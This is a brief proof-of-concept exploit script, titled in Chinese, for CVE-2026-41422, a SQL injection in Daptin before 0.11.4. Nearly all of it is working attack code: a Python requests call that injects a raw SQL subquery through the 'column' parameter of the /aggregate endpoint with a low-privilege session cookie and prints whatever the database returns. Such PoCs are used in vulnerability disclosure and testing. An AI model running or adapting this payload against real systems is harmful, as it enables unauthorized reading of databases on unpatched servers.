CVE-2026-41422 Daptin SQL注入漏洞

import requests # PoC for CVE-2026-41422 # Target: Daptin < 0.11.4 # Description: SQL Injection via /aggregate/:typename endpoint target_url = "http://target-domain.com/aggregate/users" # Malicious payload to inject raw SQL via the 'column' parameter # Example: attempting to extract database version payload = "1,(SELECT version())" params = { "column": payload } # Authentication is required (PR:L) cookies = { "session": "valid_low_privilege_session_cookie" } try: response = requests.get(target_url, params=params, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully. Check response for SQL output.") print(response.text) else: print("[-] Request failed") except Exception as e: print(f"[!] Error: {e}")